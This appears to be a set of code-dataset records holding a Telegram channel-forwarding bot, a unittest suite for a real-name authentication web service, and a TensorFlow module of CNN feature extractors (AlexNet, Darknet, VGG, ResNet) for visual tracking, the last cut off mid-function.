cut_right_part = cut_left_part[:space_symbol]\n elif space_symbol == -1:\n cut_right_part = cut_left_part[:next_line_symbol]\n # Если оба нашлись - режем по тому что ближе к началу ссылки\n elif next_line_symbol < space_symbol:\n cut_right_part = cut_left_part[:next_line_symbol]\n elif space_symbol < next_line_symbol:\n cut_right_part = cut_left_part[:space_symbol]\n # Если ничего не сработало это пометится как реклама\n else:\n cut_right_part = ''\n\n # Если ссылка не на этот же канал (зачем они так делают)\n if cut_right_part.find(channel_username) == -1:\n return True\n else:\n return True\n\n # Проверяем текст-ссылки если есть\n if message.entities:\n for entity in message.entities:\n if type(entity) == MessageEntityTextUrl:\n if channel_username is not None:\n # Если ссылка не на этот же канал (зачем они так делают)\n if entity.url.find(channel_username) == -1:\n return True\n else:\n return True\n\n # Проверяем кнопки если есть\n if message.reply_markup:\n if type(message.reply_markup) == ReplyInlineMarkup:\n for item in message.reply_markup.rows:\n if type(item) == KeyboardButtonRow:\n for button in item.buttons:\n if type(button) == KeyboardButtonUrl:\n if channel_username is not None:\n # Если ссылка не на этот же канал (зачем они так делают)\n if button.url.find(channel_username) == -1:\n return True\n else:\n return True\n\n return False\n\n\n@bot_client.on(events.Album())\nasync def handle_client_channels_albums(event):\n # Переменные для канала и сообщений в альбоме\n channel = event.chat\n messages = event.messages\n\n if channel.username is None:\n post_link = '[{0}](https://t.me/c/{1}/{2})'.format(channel.title, channel.id, messages[0].id)\n else:\n post_link = '[{0}](https://t.me/{1}/{2})'.format(channel.title, channel.username, messages[0].id)\n\n album_messages_content = ''\n\n for message in messages:\n album_messages_content += '{0}\\n'.format(message.stringify())\n\n album_messages_content = album_messages_content[:-1]\n\n logger.info('{0} NEW album\\n'\n '{1}'\n .format(post_link, album_messages_content))\n\n # Отсечка рекламных постов\n logger.info('{0} checking if album is an ad...'.format(post_link))\n if any(ad_check(message, channel.username) for message in messages):\n logger.info('{0} album is an ad'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n 'Возможно рекламный пост'\n .format(post_link),\n link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n else:\n logger.info('{0} album is not an ad'.format(post_link))\n # We assume that caption message always comes first\n caption = messages[0].message\n\n # Всякие конфигурационные переменные\n message_size_cap = 10485760 # 10 megabytes in bytes\n temp_dir_name = str(uuid4())\n os.mkdir('./{0}'.format(temp_dir_name))\n media = []\n\n for message in messages:\n # Если это документ или сжатая фотография\n if type(message.media) is MessageMediaPhoto:\n logger.info('{0} found compressed photo'.format(post_link))\n media_path = await message.download_media('./{0}/{1}'.format(temp_dir_name, str(uuid4())))\n logger.info('{0} downloaded compressed photo to {1}'.format(post_link, media_path))\n # media.append(os.path.basename(media_path))\n media.append(media_path)\n elif type(message.media) is MessageMediaDocument:\n logger.info('{0} found document'.format(post_link))\n message_size_cap -= message.media.document.size\n if message_size_cap < 0:\n logger.info('{0} too big document, cancel download'.format(post_link))\n break\n else:\n media_path = await message.download_media('./{0}/{1}'.format(temp_dir_name, str(uuid4())))\n logger.info('{0} downloaded document to {1}'.format(post_link, media_path))\n # media.append(os.path.basename(media_path))\n media.append(media_path)\n\n try:\n # Если лимит законился или ничего не скачали не отправляем ничего кроме ссылки на пост\n if message_size_cap < 0 or not media:\n logger.info('{0} nothing was downloaded, because media size exceeds 10 megabytes'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link, messages[0].message))\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если всё удалось загрузить\n else:\n logger.info('{0} successfully downloaded all media'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_file(user, media, caption='{0}\\n'\n '{1}'\n .format(post_link, caption),\n link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если не получилось отослать картинки (на это мы повлиять не можем)\n except (MediaInvalidError, MediaEmptyError):\n logger.info('{0} some or all media was downloaded, but was not sent, '\n 'because some Telegram servers error'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link, messages[0].message))\n logger.info('{0} sent to {1}'.format(post_link, user))\n try:\n # Удаляем временную папку\n logger.info('{0} removing temporary directory'.format(post_link))\n shutil.rmtree('./{0}'.format(temp_dir_name))\n logger.info('{0} removed temporary directory'.format(post_link))\n except FileNotFoundError:\n pass\n\n\n@bot_client.on(events.NewMessage())\nasync def handle_client_channels(event):\n # Put this somewhere properly (no, this would get more views on posts, which may somehow violate telegram rules)\n # await bot_client.send_read_acknowledge(channel, message)\n\n # https://t.me/{channel_username}/{message_id}\n # https://t.me/c/{channel_id}/{message_id}\n\n channel = event.chat\n message = event.message\n\n # Отсекаем альбомы\n if message.grouped_id is None:\n\n if channel.username is None:\n post_link = '[{0}](https://t.me/c/{1}/{2})'.format(channel.title, channel.id, message.id)\n else:\n post_link = '[{0}](https://t.me/{1}/{2})'.format(channel.title, channel.username, message.id)\n\n logger.info('{0} NEW post\\n'\n '{1}'\n .format(post_link, message.stringify()))\n\n # Отсекаем рекламу\n logger.info('{0} checking if post is an ad...'.format(post_link))\n if ad_check(message, channel.username):\n logger.info('{0} post is an ad'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n 'Возможно рекламный пост'\n .format(post_link),\n link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n else:\n logger.info('{0} post is not an ad'.format(post_link))\n # Если есть какие-то файлы\n logger.info('{0} checking if post has media...'.format(post_link))\n if message.media is not None:\n logger.info('{0} post has media '.format(post_link))\n media_path = ''\n temp_dir_name = str(uuid4())\n message_size_cap = 10485760 # 10 megabytes in bytes\n # Если это документ или сжатая фотография\n if type(message.media) is MessageMediaPhoto:\n logger.info('{0} found compressed photo'.format(post_link))\n media_path = await message.download_media('./{0}/{1}'.format(temp_dir_name, str(uuid4())))\n logger.info('{0} downloaded compressed photo to {1}'.format(post_link, media_path))\n # media.append(os.path.basename(media_path))\n elif type(message.media) is MessageMediaDocument:\n logger.info('{0} found document'.format(post_link))\n message_size_cap -= message.media.document.size\n if message_size_cap >= 0:\n media_path = await message.download_media('./{0}/{1}'.format(temp_dir_name, str(uuid4())))\n logger.info('{0} downloaded document to {1}'.format(post_link, media_path))\n # media.append(os.path.basename(media_path))\n else:\n logger.info('{0} too big document, cancel download'.format(post_link))\n\n # Предполагаем что там только одно прикрепление и это фото или документ\n # Если превысили лимит или не получилось скачать, а файлы это фото или документ\n try:\n if (message_size_cap < 0) and \\\n (type(message.media) == MessageMediaPhoto or type(message.media) == MessageMediaDocument):\n logger.info('{0} nothing was downloaded, because media size exceeds 10 megabytes'\n .format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link, message.message))\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если скачалось (а мы качаем только фото или документы)\n elif media_path:\n logger.info('{0} successfully downloaded all media'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_file(user, media_path, caption='{0}\\n'\n '{1}'\n .format(post_link, message.message), link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если не скачалось и файлы не фото или документы (все остальные случаи)\n else:\n logger.info('{0} post has no media to re-upload'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link,\n message.message), link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если не получилось отослать картинки (на это мы повлиять не можем)\n except (MediaInvalidError, MediaEmptyError):\n logger.info('{0} some or all media was downloaded, but was not sent, '\n 'because some Telegram servers error'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link, message.message))\n logger.info('{0} sent to {1}'.format(post_link, user))\n try:\n # Удаляем временную папку\n logger.info('{0} removing temporary directory'.format(post_link))\n shutil.rmtree('./{0}'.format(temp_dir_name))\n logger.info('{0} removed temporary directory'.format(post_link))\n except FileNotFoundError:\n pass\n\n # Если файлов нет\n else:\n logger.info('{0} post has no media'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link,\n message.message), link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n\n\nasync def check_link(message):\n link = message.message\n\n if link.startswith('https://t.me/joinchat/'):\n try:\n invite = await bot_client(CheckChatInviteRequest(link.split('/')[4]))\n if type(invite) == ChatInviteAlready:\n return 'chat_ok', invite.chat\n elif type(invite) == ChatInvite:\n if invite.channel:\n updates = await bot_client(ImportChatInviteRequest(link.split('/')[4]))\n chat = updates.chats[0]\n if chat.restricted or chat.scam or chat.fake:\n await bot_client(LeaveChannelRequest(chat))\n return 'chat_bad', None\n else:\n return 'chat_ok', chat\n else:\n return 'chat_is_group', None\n except (InviteHashExpiredError, InviteHashEmptyError):\n return 'chat_expired', None\n\n elif link.startswith('https://t.me/'):\n try:\n target = await bot_client.get_entity(link)\n if target.restricted or target.scam or target.fake:\n return 'chat_bad', None\n if not target.broadcast:\n return 'chat_is_group', None\n else:\n await bot_client(JoinChannelRequest(target)) # noqa\n return 'chat_ok', target\n except ValueError:\n return 'chat_expired', None\n\n # TODO: This is totally not working but it would be a very convenient thing\n # If this is forwarded post\n # elif message.fwd_from:\n # if type(message.fwd_from.from_id) == PeerChannel:\n # target = await bot_client.get_entity(message.fwd_from.from_id)\n # if target.restricted or target.scam or target.fake:\n # return 'chat_bad', None\n # # I don't think that broadcast parameter can be applied to this\n # # because if PeerChannel then it's 100% channel not a group chat\n # if not target.broadcast:\n # return 'chat_is_group', None\n # else:\n # await bot_client(JoinChannelRequest(target))\n # return 'chat_ok', target\n # else:\n # return 'chat_expired', None\n\n else:\n return 'chat_expired', None\n\n\n@bot_bot.on(events.NewMessage())\nasync def handle_bot_input_message(event):\n user = event.chat\n message = event.message\n\n if message.message == '/start':\n db_set_new_user(user.id)\n await message.reply('Привет, я бот который поможет тебе создать что-то похожее на ленту новостей.\\n\\n'\n 'Я буду пересылать сюда посты из каналов на которые ты подпишешься здесь, таким образом '\n 'ты можешь проверять только диалог со мной и смотреть свежие посты из всех групп сразу, '\n 'это ли не чудо?\\n\\n'\n 'Кстати ты можешь не подписываться на канал сам, а подписаться только здесь, но я не '\n 'советую так делать, потому что каналам важен каждый подписчик! (а ещё если я буду '\n 'недоступен - постов тоже не будет)\\n\\n'\n 'Команды для управления твоими подписками:\\n'\n '/list - список подписок\\n'\n '/subscribe - подписаться на канал\\n'\n '/unsubscribe - отменить подписку на канал\\n\\n'\n '**ВАЖНО**\\n'\n 'V1.4:\\n'\n '- Теперь я могу пересылать тебе посты из **приватных каналов!**\\n'\n '- Теперь я по-другому пересылаю тебе посты - не просто отправляю ссылку на пост, а '\n '**перезаливаю пост полностью!** Это накладывает **ограничения**: '\n 'если в посте файлы больше чем можно переслать, то я отправлю что смогу, сообщу о том что '\n 'не смог переслать всё и оставлю ссылку на пост\\n'\n '- Что осталось по-старому, так это то, что я могу часто быть **недоступен** или '\n '**медленно реагировать** из-за нагрузки, '\n 'интернета в том месте где я нахожусь или просто от тяжёлой жизни\\n\\n'\n '**P.S.** Ты и так знаешь кто меня сделал, так что подумай нужна ли тут пересылка из '\n 'ВКонтакте и напиши ему в лс, конечно же в Телеграме', link_preview=False)\n\n state = db_get_user_state(user.id)\n \n if message.message == '/list':\n message_text = ''\n for idx, channel in enumerate(db_get_user_channels(user.id)):\n if channel[1] is None:\n message_text += '**{0}.** {1} (приватный)\\n'.format(idx + 1, channel[2])\n else:\n message_text += '**{0}.** [{2}](https://t.me/{1})\\n'.format(idx + 1, channel[1], channel[2])\n message_text = message_text[:-1]\n message_text = 'Понял, вот список каналов на которые ты подписан:\\n\\n' + message_text\n await message.reply(message_text, link_preview=False)\n\n elif message.message == '/subscribe':\n await message.reply('Хорошо, отправь мне ссылку на канал, она выглядит примерно так:\\n'\n 'https://t.me/{имя_канала} (для публичных каналов)\\n'\n 'или\\n'\n 'https://t.me/joinchat/{разные_буквы_и_цифры} (для приватных каналов)\\n\\n'\n '(из-за обновления API телеграма некоторые ссылки могут не работать)',\n link_preview=False)\n db_update_user_state(user.id, 'subscribe')\n\n elif message.message == '/unsubscribe':\n message_text = ''\n for idx, channel in enumerate(db_get_user_channels(user.id)):\n if channel[1] is None:\n message_text += '**{0}.** {1} (приватный)\\n'.format(idx + 1, channel[2])\n else:\n message_text += '**{0}.** [{2}](https://t.me/{1})\\n'.format(idx + 1, channel[1], channel[2])\n message_text = message_text[:-1]\n message_text = 'Окей, список каналов на которые ты подписан:\\n\\n' + message_text\n message_text += '\\n\\nОтправь номер канала от которого хочешь отписаться, если передумал - отправь любой ' \\\n '**номер которого здесь нет** или **текст**'\n await message.reply(message_text, link_preview=False)\n db_update_user_state(user.id, 'unsubscribe')\n\n elif state == 'subscribe':\n # Public channels/groups: https://t.me/{channels_username}\n # Private channels/groups: https://t.me/joinchat/{some_code}\n\n result = await check_link(message)\n\n if result[0] == 'chat_bad':\n logger.warning('{0} was trying to subscribe to bad channel! DO SOMETHING!'.format(user.id))\n await message.reply('Я не могу подписывать тебя на каналы, которые нарушали правила', link_preview=False)\n db_update_user_state(user.id, 'idle')\n elif result[0] == 'chat_is_group':\n await message.reply('Я не могу подписывать тебя на групповые чаты', link_preview=False)\n db_update_user_state(user.id, 'idle')\n elif result[0] == 'chat_expired':\n await message.reply('Ссылка неправильная или её срок действия истёк', link_preview=False)\n db_update_user_state(user.id, 'idle')\n elif result[0] == 'chat_ok':\n db_add_new_channel_or_user(result[1].id, result[1].username, result[1].title, user.id)\n db_update_user_state(user.id, 'idle')\n await message.reply('Готово!\\nСкоро тут начнут появляться посты из этого канала:\\n{0}'\n .format(result[1].title), link_preview=False)\n\n elif state == 'unsubscribe':\n try:\n idx = int(message.message) - 1\n if idx < 0:\n db_update_user_state(user.id, 'idle')\n await message.reply('Отмена. Все подписки остались на месте', link_preview=False)\n else:\n channel = db_get_user_channels(user.id)[idx]\n if channel[1] is None:\n reply = 'Успешная отписка от {0} (приватный)\\n'.format(channel[2])\n else:\n reply = 'Успешная отписка от [{1}](https://t.me/{0})\\n'.format(channel[1], channel[2])\n db_delete_user_from_channel(channel[0], user.id)\n db_update_user_state(user.id, 'idle')\n await message.reply(reply)\n except (ValueError, IndexError):\n db_update_user_state(user.id, 'idle')\n await message.reply('Отмена. Все подписки остались на месте', link_preview=False)\n\nwith bot_client:\n bot_client.loop.run_forever()\n","repo_name":"dimondjik/personal_telegram_newsletter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33585,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43062174257","text":"# -*- coding: utf-8 -*-\n# @time:2019/5/5 15:05\n# Author:殇殇\n# @file:test_verifiedUserAuth.py\n# @fuction: 测试实名认证的接口\n\nimport unittest\nfrom xml.sax.saxutils import escape\nfrom ddt import ddt,data\nfrom common.do_excel import DoExcel\nfrom common.contants import *\nfrom common.do_suds import DoSuds\nfrom suds import WebFault\nfrom common.do_cardid import GetCardid\nfrom common.do_context import replace,Context\nfrom common.do_mysql import DoMysql\nimport random\nimport warnings\nfrom common.my_log import MyLog\n\nmy_log = MyLog (__name__)\n\ndo_excel = DoExcel(case_file,'verifiedUserAuth')\nverifiedUserAuth_caces = do_excel.get_data()\n\n\n@ddt\nclass VerifiedUserAuthTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n warnings.simplefilter (\"ignore\", ResourceWarning)\n my_log.info('---开始执行测试用例---')\n cls.do_suds = DoSuds ()\n cls.mysql = DoMysql ('user_db')\n cls.card = GetCardid ().gennerator ()\n\n @data(*verifiedUserAuth_caces)\n def test_verifiedUserAuth(self,case):\n global username\n my_log.info ('开始执行第{}条测试用例:{}'.format (case.case_id,case.title))\n case.data = replace (case.data)\n # 在请求之前,检查是否执行SQL语句\n if case.check_sql:\n sql = eval(case.check_sql)['sql1']\n sql_result = self.mysql.fetch_one (sql)\n auth_before = sql_result['count(Fpk_id)']\n my_log.info ('实名认证之前,数据库的数据有:{}'.format (auth_before))\n\n # 生成唯一的手机号码(将数据库中最大的手机号+1000) 发生验证码接口--normal_mobile\n if case.data.find('normal_mobile')>-1:\n sql = 'select max(Fmobile_no) from sms_db_20.t_mvcode_info_0 ;'\n max_phone = self.mysql.fetch_one(sql)\n max_phone = int(max_phone['max(Fmobile_no)'])+1000\n case.data = case.data.replace('normal_mobile',str(max_phone))\n # 注册接口 #register_mobile# 将最大的手机号 传到注册接口中\n setattr(Context,'register_mobile',str(max_phone))\n # 保证注册接口的用户名不一样 username (用户名唯一)\n if case.data.find('username')>-1:\n username = getattr(Context,'username')+str(random.randint(1,100))\n case.data = case.data.replace('username',str(username))\n setattr(Context,'username',str(username))\n\n # 将自动生成的身份证号存在card_id 中\n setattr(Context,'card_id',str(self.card))\n card_id = getattr(Context,'card_id')\n case.data = case.data.replace ('card_id', self.card)\n my_log.info('自动生成的身份证号是:{}'.format(card_id))\n\n\n try:\n result = self.do_suds.do_suds (case.method, case.url, case.data)\n print ('响应的结果是:{}'.format (result))\n self.assertEqual (case.expected, escape (result[1]))\n do_excel.write_back (case.case_id + 1, escape (result[1]), 'Pass')\n\n # 2.从user_db.t_user_info表中,查到Fuid 并替换参数化\n if escape(result[1])=='ok':\n # 1.将发送的验证码 取出来\n mobile = str(getattr(Context,'register_mobile'))\n sql = \"select Fverify_code from sms_db_20.t_mvcode_info_0 where Fmobile_no = {} \".format (mobile)\n phone_code = self.mysql.fetch_one(sql)\n phone_code = phone_code['Fverify_code']\n setattr(Context,'phone_code',str(phone_code))\n my_log.info('注册的手机号:{}'.format(mobile))\n my_log.info ('验证码:{}'.format (phone_code))\n\n # 注册功能后,查询数据库 根据用户名将Fuid 用户id取出来\n username = str(getattr(Context,'username'))\n sql = \"select Fuid from user_db.t_user_info where Fuser_id = '{}'\".format(username)\n user_id = self.mysql.fetch_one(sql)\n user_id = user_id['Fuid']\n my_log.info('查到的用户id是:{}'.format(user_id))\n setattr(Context,'user_id',str(user_id))\n\n # 在请求成功之后,检查是否执行SQL语句\n if case.check_sql:\n sql = eval(case.check_sql)['sql1']\n sql_result = self.mysql.fetch_one (sql)\n auth_after = sql_result['count(Fpk_id)']\n my_log.info ('实名认证之后,数据库的数据有:{}'.format (auth_after))\n\n except AssertionError as e:\n my_log.error ('断言失败了:{}'.format (e))\n do_excel.write_back (case.case_id + 1, escape (result[1]), 'Failed')\n raise e\n except WebFault as error:\n result = str ((error.__dict__)['fault'].faultstring)\n try:\n print ('返回结果是:{}'.format (result))\n self.assertEqual (case.expected, result)\n do_excel.write_back (case.case_id + 1, result, 'Pass')\n except AssertionError as e:\n my_log.error ('捕获断言失败:{}'.format (e))\n do_excel.write_back (case.case_id + 1, result, 'Failed')\n raise e\n\n\n @classmethod\n def tearDownClass(cls):\n cls.mysql.close()\n my_log.info('---测试用例执行结束---')\n\n\nif __name__ == '__main__':\n unittest.main()\n\n\n","repo_name":"gracesoul/python_webservice","sub_path":"testcases/test_verifiedUserAuth.py","file_name":"test_verifiedUserAuth.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15406251980","text":"'''\nNote that all functions are modified to use e.g. cnn.slim_conv2d() instead of slim.conv2d().\nThese functions use a cnn.Tensor to keep track of the receptive field.\n\nYou should not use slim.arg_scope() to modify the internal behaviour of these functions!\n(Except through the provided e.g. alexnet.alexnet_v2_arg_scope().)\nThis is because a user does not know which functions are called internally.\nInstead, these functions will expose all relevant options and use arg_scope internally.\n\nWe add parameter `variables_collections`.\n\nNot yet: We add parameter `use_batch_norm`.\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nslim = tf.contrib.slim\n\nfrom seqtrack import cnn\nfrom seqtrack import helpers\n\nfrom . import util\nfrom . import alexnet as alexnet_pkg\nfrom . import vgg as vgg_pkg\nfrom . import resnet_v1 as resnet_v1_pkg\n\n\n# API of a feature function:\n# \n# Takes an image and returns an output and a series of named intermediate endpoints (tensors).\n# The intermediate endpoints may be used for multi-depth cross-correlation.\n\n# TODO: Avoid duplication of default parameters here if possible?\n\n\ndef alexnet(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0,\n output_layer='conv5',\n output_act='linear',\n freeze_until_layer=None,\n padding='VALID',\n enable_bnorm=True):\n with slim.arg_scope(feature_arg_scope(\n weight_decay=weight_decay, enable_bnorm=enable_bnorm, padding=padding)):\n return _alexnet_layers(x, is_training, trainable, variables_collections,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef feature_arg_scope(weight_decay, enable_bnorm, padding):\n with slim.arg_scope(\n [cnn.slim_conv2d],\n weights_regularizer=slim.l2_regularizer(weight_decay) if weight_decay else None,\n normalizer_fn=slim.batch_norm if enable_bnorm else None):\n with slim.arg_scope([cnn.slim_conv2d, cnn.slim_max_pool2d],\n padding=padding) as arg_sc:\n return arg_sc\n\n\ndef _alexnet_layers(x, is_training, trainable=True, variables_collections=None,\n output_layer='conv5',\n output_activation_fn=None,\n freeze_until_layer=None):\n # Should is_training be disabled with trainable=False?\n with slim.arg_scope([slim.batch_norm], is_training=is_training):\n with slim.arg_scope([cnn.slim_conv2d, slim.batch_norm],\n trainable=trainable,\n variables_collections=variables_collections):\n # https://github.com/bertinetto/siamese-fc/blob/master/training/vid_create_net.m\n # https://github.com/tensorflow/models/blob/master/research/slim/nets/alexnet.py\n # x = cnn.slim_conv2d(x, 96, [11, 11], 2, scope='conv1')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool1')\n # x = cnn.slim_conv2d(x, 256, [5, 5], scope='conv2')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool2')\n # x = cnn.slim_conv2d(x, 384, [3, 3], scope='conv3')\n # x = cnn.slim_conv2d(x, 384, [3, 3], scope='conv4')\n # x = cnn.slim_conv2d(x, 256, [3, 3], scope='conv5',\n # activation_fn=output_activation_fn, normalizer_fn=None)\n layers = [\n ('conv1', util.partial(cnn.slim_conv2d, 96, [11, 11], 2)),\n ('pool1', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv2', util.partial(cnn.slim_conv2d, 256, [5, 5])),\n ('pool2', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv3', util.partial(cnn.slim_conv2d, 384, [3, 3])),\n ('conv4', util.partial(cnn.slim_conv2d, 384, [3, 3])),\n ('conv5', util.partial(cnn.slim_conv2d, 256, [3, 3])),\n ]\n return util.evaluate_until(\n layers, x, output_layer,\n output_kwargs=dict(\n activation_fn=output_activation_fn,\n normalizer_fn=None),\n freeze_until_layer=freeze_until_layer)\n\n\ndef darknet(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0,\n output_layer='conv5',\n output_act='linear',\n freeze_until_layer=None,\n padding='VALID',\n enable_bnorm=True):\n with slim.arg_scope(feature_arg_scope(\n weight_decay=weight_decay, enable_bnorm=enable_bnorm, padding=padding)):\n return _darknet_layers(x, is_training, trainable, variables_collections,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef _darknet_layers(x, is_training, trainable=True, variables_collections=None,\n output_layer='conv5',\n output_activation_fn=None,\n freeze_until_layer=None):\n # Should is_training be disabled with trainable=False?\n with slim.arg_scope([slim.batch_norm], is_training=is_training):\n with slim.arg_scope([cnn.slim_conv2d, slim.batch_norm],\n trainable=trainable,\n variables_collections=variables_collections):\n # https://github.com/pjreddie/darknet/blob/master/cfg/darknet.cfg\n with slim.arg_scope([cnn.slim_conv2d], activation_fn=helpers.leaky_relu):\n # x = cnn.slim_conv2d(x, 16, [3, 3], 1, scope='conv1')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool1')\n # x = cnn.slim_conv2d(x, 32, [3, 3], 1, scope='conv2')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool2')\n # x = cnn.slim_conv2d(x, 64, [3, 3], 1, scope='conv3')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool3')\n # x = cnn.slim_conv2d(x, 128, [3, 3], 1, scope='conv4')\n # x = cnn.slim_max_pool2d(x, [3, 3], 2, scope='pool4')\n # x = cnn.slim_conv2d(x, 256, [3, 3], 1, scope='conv5',\n # activation_fn=output_activation_fn, normalizer_fn=None)\n layers = [\n ('conv1', util.partial(cnn.slim_conv2d, 16, [3, 3], 1)),\n ('pool1', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv2', util.partial(cnn.slim_conv2d, 32, [3, 3], 1)),\n ('pool2', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv3', util.partial(cnn.slim_conv2d, 64, [3, 3], 1)),\n ('pool3', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv4', util.partial(cnn.slim_conv2d, 128, [3, 3], 1)),\n ('pool4', util.partial(cnn.slim_max_pool2d, [3, 3], 2)),\n ('conv5', util.partial(cnn.slim_conv2d, 256, [3, 3], 1)),\n ]\n return util.evaluate_until(\n layers, x, output_layer,\n output_kwargs=dict(\n activation_fn=output_activation_fn,\n normalizer_fn=None),\n freeze_until_layer=freeze_until_layer)\n\n\ndef slim_alexnet_v2(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0.0005,\n conv_padding='VALID',\n pool_padding='VALID',\n conv1_stride=4,\n output_layer='conv5',\n output_act='linear',\n freeze_until_layer=None):\n if not trainable:\n raise NotImplementedError('trainable not supported')\n # TODO: Support variables_collections.\n\n with slim.arg_scope(alexnet_pkg.alexnet_v2_arg_scope(\n weight_decay=weight_decay,\n conv_padding=conv_padding,\n pool_padding=pool_padding)):\n return alexnet_pkg.alexnet_v2(\n x,\n is_training=is_training,\n conv1_stride=conv1_stride,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef slim_vgg_a(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0.0005,\n conv_padding='VALID',\n pool_padding='VALID',\n output_layer='conv5/conv5_2',\n output_act='linear',\n freeze_until_layer=None):\n if not trainable:\n raise NotImplementedError('trainable not supported')\n # TODO: Support variables_collections.\n\n with slim.arg_scope(vgg_pkg.vgg_arg_scope(\n weight_decay=weight_decay,\n conv_padding=conv_padding,\n pool_padding=pool_padding)):\n return vgg_pkg.vgg_a(\n x, is_training=is_training,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef slim_vgg_16(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0.0005,\n conv_padding='VALID',\n pool_padding='VALID',\n output_layer='conv5/conv5_3',\n output_act='linear',\n freeze_until_layer=None):\n if not trainable:\n raise NotImplementedError('trainable not supported')\n # TODO: Support variables_collections.\n\n with slim.arg_scope(vgg_pkg.vgg_arg_scope(\n weight_decay=weight_decay,\n conv_padding=conv_padding,\n pool_padding=pool_padding)):\n return vgg_pkg.vgg_16(\n x, is_training=is_training,\n output_layer=output_layer,\n output_activation_fn=helpers.get_act(output_act),\n freeze_until_layer=freeze_until_layer)\n\n\ndef slim_resnet_v1_50(x, is_training, trainable=True, variables_collections=None,\n weight_decay=0.0001,\n use_batch_norm=True,\n # reuse=None,\n # scope='resnet_v1_50',\n conv_padding='VALID',\n pool_padding='VALID',\n conv1_stride=2,\n pool1_stride=2,\n num_blocks=4,\n block1_stride=2,\n block2_stride=2,\n block3_stride=2):\n if not trainable:\n raise NotImplementedError('trainable not supported')\n with slim.arg_scope(resnet_v1_pkg.resnet_arg_scope(\n weight_decay=weight_decay,\n use_batch_norm=use_batch_norm,\n pool_padding=pool_padding,\n variables_collections=variables_collections)):\n return resnet_v1_pkg.resnet_v1_50(\n x,\n is_training=is_training,\n # reuse=None,\n # scope='resnet_v1_50',\n conv_padding=conv_padding,\n conv1_stride=conv1_stride,\n pool1_stride=pool1_stride,\n num_blocks=num_blocks,\n block1_stride=block1_stride,\n block2_stride=block2_stride,\n block3_stride=block3_stride)\n\n\nNAMES = [\n 'alexnet',\n 'darknet',\n 'slim_alexnet_v2',\n 'slim_resnet_v1_50',\n 'slim_vgg_a',\n 'slim_vgg_16',\n]\n\nBY_NAME = {name: globals()[name] for name in NAMES}\n\n\ndef get_receptive_field(feature_fn):\n '''\n Args:\n feature_fn: Function that maps (image, is_training) to (image, end_points).\n '''\n graph = tf.Graph()\n with graph.as_default():\n image = tf.placeholder(tf.float32, (None, None, None, 3), name='image')\n is_training = tf.placeholder(tf.bool, (), name='is_training')\n image = 